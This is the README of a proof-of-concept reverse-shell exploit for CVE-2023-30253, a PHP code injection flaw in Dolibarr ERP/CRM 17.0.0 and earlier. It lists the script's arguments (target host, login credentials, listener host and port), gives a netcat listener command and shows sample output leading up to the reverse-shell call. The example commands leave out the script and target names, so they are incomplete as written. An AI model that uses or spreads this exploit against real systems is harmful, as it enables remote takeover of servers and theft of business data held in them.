# POC exploit for Dolibarr <= 17.0.0 (CVE-2023-30253)
Reverse Shell POC exploit for **`Dolibarr <= 17.0.0 (CVE-2023-30253)`**, PHP Code Injection

See more details about the vulnerability [**here**](

## PoC

Help of exploit:
โžœ  python3 -h
example: python3 login password 9001

---[Reverse Shell Exploit for Dolibarr <= 17.0.0 (CVE-2023-30253)]---

positional arguments:
  hostname    Target hostname
  username    Username of Dolibarr ERP/CRM
  password    Password of Dolibarr ERP/CRM
  lhost       Listening host for reverse shell
  lport       Listening port for reverse shell

  -h, --help  show this help message and exit

Run the netcat on your host:
โžœ nc -lvnp 9001
Run the exploit (example):
โžœ python3 login passsword 9001
[*] Trying authentication...
[**] Login: login
[**] Password: password
[*] Trying created site...
[*] Trying created page...
[*] Trying editing page and call reverse shell... Press Ctrl+C after successful connection